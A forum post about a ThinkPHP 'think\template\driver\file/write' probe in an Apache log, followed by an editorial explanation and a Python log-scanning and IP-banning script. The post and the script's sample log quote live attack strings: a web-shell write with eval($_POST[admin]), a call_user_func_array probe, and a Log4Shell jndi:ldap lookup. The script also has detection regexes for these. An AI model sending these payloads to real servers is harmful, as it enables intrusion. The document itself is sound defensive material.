I keep seeing query strings like this, some even more convoluted:
Code:
GET /?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[admin]);?> HTTP/1.1" 302 687 "[my site]/?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php @eval($_POST[admin]);?>
All I have is a static HTML page right now, so I don't know what they're trying to do, but is there maybe a way to execute PHP directly somehow? It almost looks like that's what they're trying to do, or maybe even being successful. Whatever is in the POST might be the payload. Looks like they're using the user agent string as part of the attack as well.
My server got hacked a while back, twice; the second time was a brand new install of Debian with nothing else on it, just a basic landing page saying the sites are coming back. Got hacked overnight as backups were being uploaded to it. Starting to wonder if there is a 0-day in Apache that is not discovered yet. Maybe somehow related to log4j? For example, could some of that code be used in Apache too, even though it's not Java?
Going to let this run for a while to see if it eventually gets hacked again; there's basically no attack surface at this point, as I literally just have Apache with a basic HTML page and SSH running (key pair auth only). I want to try to self-host again, but it seems there is some kind of sophisticated attack being used against me, considering they were able to hack a brand new box with nothing set up yet. Not sure whether that query string is part of the attack or not.
Is there a way to intercept these queries before they end up going to Apache? I guess some kind of reverse proxy, maybe? I want to look for keywords and just ignore them, and automatically ban the IPs that attempt this stuff.
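The posted line is a mass scanner probing for the ThinkPHP 5 remote code execution bug: the `s=index/\think\template\driver\file/write` route abuses ThinkPHP's router to write a `robots1.php` file containing an `eval($_POST[admin])` web shell, which the scanner then drives with POST requests. It only does anything on a site actually running a vulnerable ThinkPHP; Apache serving a static HTML page has no PHP handler, so the query string is merely logged, and the 302 in the line means Apache answered with a redirect rather than executing anything. `${jndi:...}` strings planted in a User-Agent header are the same kind of noise against httpd: they target Log4j inside Java applications, which Apache httpd does not use. As an added example of the kind of check a log watcher or reverse proxy would run (this is editorial code, not from the post or the poster's server), the script below parses Apache combined-log lines, URL-decodes the request path, referer and User-Agent, matches them against a few indicator patterns, and produces a ban list. The log lines are constructed for the example, the IPs are RFC 5737 documentation addresses, and the `iptables` command assumes iptables is the firewall in use.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-log lines for demonstration only (RFC 5737 documentation
# addresses, not traffic from the original post's server).
SAMPLE_LOG = r'''203.0.113.7 - - [12/Jan/2022:03:14:07 +0000] "GET /?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[admin]);?> HTTP/1.1" 302 687 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2022:03:14:08 +0000] "GET /robots1.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jan/2022:03:20:41 +0000] "GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=Hello HTTP/1.1" 302 687 "-" "Mozilla/5.0"
192.0.2.55 - - [12/Jan/2022:03:30:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.99 - - [12/Jan/2022:03:31:12 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.9/a}"
'''

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator patterns, applied to the *decoded* request. Apache escapes a backslash
# in the request line as "\\", hence "\\+" (one or more backslashes) in the first rule.
RULES = (
    # ThinkPHP 5 "s=" routing RCE probe: reaches internal \think\ classes via the router.
    ("thinkphp_rce_probe", re.compile(r"[?&]s=index/\\+think\\+", re.I)),
    # Inline PHP or an eval() web-shell stub fed from a request variable.
    ("php_webshell_payload", re.compile(r"<\?php|@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I)),
    # Log4Shell-style JNDI lookup string, usually planted in User-Agent or Referer.
    ("jndi_lookup_string", re.compile(r"\$\{\s*jndi:", re.I)),
)


def decode(s, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads cannot slip past keyword checks."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def classify(line):
    """Parse one combined-log line; return its fields plus the list of rule names it triggers, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Check path, referer and User-Agent together: scanners put payloads in all three.
    haystack = "\n".join(decode(rec[k]) for k in ("path", "referer", "ua"))
    rec["rules"] = [name for name, rx in RULES if rx.search(haystack)]
    return rec


def scan(log_text):
    """Return (findings, counts): matching records, and a Counter of hits per client IP."""
    findings, counts = [], Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = classify(line)
        if rec and rec["rules"]:
            findings.append(rec)
            counts[rec["ip"]] += 1
    return findings, counts


def ban_list(counts, threshold=1):
    """IPs that triggered at least `threshold` indicators, sorted for stable output."""
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def iptables_rules(ips):
    """Firewall commands for the ban list. Assumes iptables; adapt for nftables or fail2ban."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    found, hits = scan(SAMPLE_LOG)
    for rec in found:
        print(f'{rec["ip"]} {rec["status"]} {rec["method"]} {rec["path"][:60]} -> {", ".join(rec["rules"])}')
    for cmd in iptables_rules(ban_list(hits)):
        print(cmd)
```

In the constructed log the scanner's follow-up request for `robots1.php` gets a 404, which is the check worth doing on a real server too: if the shell file does not exist and the response codes to the probe are 3xx/4xx, nothing was written. Decoding before matching matters because scanners routinely percent-encode or double-encode `<?php` and `eval(` to get past naive keyword filters. For production use, fail2ban with a custom filter whose `failregex` is built from the same patterns will do the banning without any code, and ModSecurity in front of Apache (or as a reverse proxy) can block such requests outright.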